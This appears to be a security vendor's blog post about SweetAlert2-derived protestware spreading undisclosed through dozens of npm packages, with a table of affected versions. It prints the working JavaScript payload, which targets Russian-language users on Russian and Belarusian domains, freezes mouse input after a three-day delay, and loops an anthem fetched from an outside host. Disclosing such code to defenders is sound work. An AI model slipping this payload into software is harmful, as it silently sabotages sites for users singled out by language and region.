
Olivia Brown
July 15, 2025
Socket’s Threat Research Team recently reported on two npm packages with hidden functionality for Russian-language users visiting Russian domains in a browser. In the last few weeks, the team has found the same protestware script across at least 28 new packages with nearly 2,000 versions.
As a reminder, this code stops UI interactions from working on websites for any Russian-language users visiting Russian or Belarusian domains, which falls under Socket's protestware alert classification.
Most of these packages contain 100,000+ lines of code. Deep within that code, usually towards the end, is a code snippet identical to the one discussed in our original blog post.
It is a compound if statement that requires that the user (1) is in a browser, (2) has the browser language set to Russian and (3) is visiting a Russian or Belarusian domain. If all three conditions are met, the protestware disables all mouse-based interaction on the page and plays the Ukrainian national anthem.
```javascript
// Dear russian users visiting russian sites. Let's have fun.
if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
  var now = new Date();
  // The first qualifying visit is only recorded; nothing happens yet.
  var initiationDate = localStorage.getItem('swal-initiation');
  if (!initiationDate) {
    localStorage.setItem('swal-initiation', "".concat(now));
  } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
    // A later visit more than three days after the recorded one triggers the payload.
    setTimeout(function () {
      document.body.style.pointerEvents = 'none'; // blocks all mouse interaction
      var ukrainianAnthem = document.createElement('audio');
      ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
      ukrainianAnthem.loop = true;
      document.body.appendChild(ukrainianAnthem);
      setTimeout(function () {
        ukrainianAnthem.play()["catch"](function () {
          // ignore
        });
      }, 2500);
    }, 500);
  }
}
```
Sweetalert2, a package with over 700,000 weekly downloads, has certain versions containing the protestware. It describes itself as "A beautiful, responsive, customizable and accessible (WAI-ARIA) replacement for JavaScript's popup boxes, supported fork of sweetalert."
On sweetalert2's npm registry page, the author discloses the protestware:
Important notice about the usage of this software for .ru, .su, .by, and .рф domain zones As a consequence of the illegal war in Ukraine, the behavior of this repository and related npm package sweetalert2 is different for .ru, .su, .by, and .рф domain zones.
Including this software in any domain in .ru, .su, .by, and .рф domain zones will block the website navigation and play the national anthem of Ukraine.
The author, limonte, began disclosing this information in version 11.6.14, which was published 3 years ago, likely when Russia invaded Ukraine, and has disclosed it in every version since. The package is currently on version 11.22.2. Versions 9.17.3 - 11.6.6 also include this protestware.
However, several other packages by different authors all carry this protestware without any mention of it. It is not listed or acknowledged in their README files or anywhere else. Based on the similar file names and structure shared by the affected packages, they appear to have copied it from SweetAlert2. The protestware has therefore spread from SweetAlert2, likely through copied code, in a pattern resembling unintentional supply chain propagation.
Here is a list of some of the packages we have found with the protestware:

| Package | Publish date | Peak downloads | Author info | Current state | Affected versions | Most recent version |
|---|---|---|---|---|---|---|
| starlawfirm-counsel-function-test | Created 5 months ago | 1,281 | @kimminsu_2 | Deprecated | All (18) | 0.2.4, published 5 months ago |
| @starlawfirm/counsel-function | Created 5 months ago | 284 | @choiyeongung, @kimminsu_2, imjiwon, leegeonju2 | Live | All (13) | 0.0.12, published 17 hours ago |
| falcon-library-comp | Created 6 months ago | 1,822 | falcon.ttt | Live | 0.0.34 - 0.0.42 (7) | 0.0.42, published 5 months ago |
| vristo-components | Created a year ago | 575 | amirzarei | Live | 0.0.12 - 0.1.8 (29) | 0.1.8, published a year ago |
| currency_contry_exchange | Created 9 months ago | 1,276 | [lash1795](https://www.npmjs.com/~lash1795) | Live | 1.2.7 - 1.7.1 (27) | 1.7.1, published 21 hours ago |
| @flasher/flasher-sweetalert | Created 3 years ago | 276 | [yoeunes](https://www.npmjs.com/~yoeunes) | Live | All (29) | 2.1.5, published 5 months ago |
| @khaledtag/karrot_ui | Created a year ago | 446 | khaledtag | Live | All (13) | 0.0.51, published 10 months ago |
| raffoom-poltergeist | Created 2 years ago | 156 | raffoom-ltd | Live | 0.0.7-rev-006 - 0.0.9-rev1 (11) | 0.0.9-rev1, published 2 months ago |
| @trustech/components | Created 9 months ago | 378 | power_trustech | Live | 1.0.3 - 1.2.10 (19) | 1.2.10, published 5 months ago |
| be-table-template | Created last year | 951 | taonv | Live | 1.0.1 - 2.9.8 (198) | 2.9.8, published a month ago |
| shafa-bo | Created last year | 233 | binapm | Live | 0.0.68 - 0.0.134 (49) | 0.0.134, published a year ago |
| Pandora-Cloud-DC | Created 2 years ago | | dockercore | Live | All (1) | 0.1.0, published 2 years ago |
| fakeoai | Created 1 year ago | | laibaoyuan | Live | 0.1.5 - 0.1.6 (2) | 0.1.6, published 1 year ago |
| Pandora-Cloud | Created 2 years ago | | pengzhile | Live | 0.4.7 - 0.7.3 (12) | 0.7.3, published 1 year ago |
| richness-client-side-validator | Created 2 years ago | | richnessinc | Deprecated | 1.1.0 - 1.5.7 (14) | 1.5.7, published 2 years ago |
| kdpa-components | Created 2 years ago | 734 | work.enaadb, frontenddepna, lotfalizade.moh | Live | 1.0.0 - 1.58.4 (259) | 1.58.4, published last week |
| coone-annotation-tool | Created 2 years ago | 1,150 | mede | Live | 0.0.78 - 0.1.153 (177) | 0.1.155, published 9 hours ago |
| landing-goplaceit2 | Created 2 years ago | 32 | enzo388 | Live | 1.0.48 - 1.0.58 (10) | 1.0.58, published 2 years ago |
| meshcentral | Created 8 years ago | 16,895 | ysainthilaire | Live | [1.1.32 - 1.1.44](https://www.npmjs.com/package/meshcentral/v/0.9.68?activeTab=versions) (12) | 1.1.44, published 20 hours ago |
| @esvndev/es-react-table-interface | Created 2 months ago | 820 | esvndev | Live | All (62) | 1.4.6, published 4 days ago |
| @esvndev/es-react-dynamic-column | Created last month | 673 | esvndev | Live | All (14) | 1.0.14, published a month ago |
| files.photo.gallery | Created 5 years ago | 409 | [photo.gallery](https://www.npmjs.com/~photo.gallery) | Live | 0.6.0 - 0.13.1 (33) | 0.13.1, published a month ago |
| qti3-item-player | Created 4 years ago | 267 | paulgrudnitski | Live | 0.4.15 - 1.1.20 (40) | 1.1.20, published 2 months ago |
| qumra-ui | Created 10 months ago | 2,074 | abdalstar, khalidwalid00 | Live | 0.0.71 - 0.0.153 (82) | 0.0.153, published 3 months ago |
| qumra-editor | Created 12 months ago | 227 | abdalstar, motea | Live | 0.0.4 - 0.0.8 (4) | 0.0.8, published 10 months ago |
| alurkerja-ui | Created 2 years ago | 1,521 | theakistea | Live | [0.0.3 - 0.0.575](https://www.npmjs.com/package/alurkerja-ui?activeTab=versions) (572) | 0.0.575, published a month ago |
| konnektive-engine | Created 3 years ago | 229 | brunoferreiras, drew.altukhov | Live | 0.2.2 - 0.3.82 (59) | 0.3.82, published a month ago |
| es-workflow-template | Created 5 months ago | 602 | becoxy | Live | All (32) | 0.4.5, published 18 days ago |

limonte ensured that only repeat visitors are targeted, so anyone who mistakenly finds their way to such a domain and has their language set to Russian will not be impacted. Unless, of course, they make that same mistake twice.
Other affected users may be Russian-speaking researchers visiting official state websites or archived domains. Note that Russian is spoken widely outside Russia, including in Central Asian countries such as Kazakhstan, and in Ukraine.
Since so many packages copied versions of SweetAlert2 without disclosing that this protestware exists in their code, the addition of this protestware has likely had a cascading effect.
Protestware is a formidable method of speech for software developers to express political or social stances. Socket supports this freedom for developers to create as they see fit.
We are marking these packages as malware since that is the definition with which the activity aligns most closely. The package triggers unexpected behavior for some users and, other than sweetalert2 itself, the behavior is not documented. Because the protestware is undocumented in most of these packages, developers and users may be unaware of its presence or intent, even if it was copied unintentionally. This lack of transparency increases the risk of surprise behavior and erodes trust in the ecosystem.
Socket has flagged the packages with this protestware as malware, with the following explicit description:
The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.
This protestware underscores that actions taken by developers can propagate unnoticed in nested dependencies and may take days or weeks to manifest. The Socket Threat Research Team continues to find more examples of this protestware. These findings serve as a reminder to check your packages. Socket can help.
By integrating Socket's free security tools early in your development workflow, you can catch undisclosed functionality like this before it reaches your users.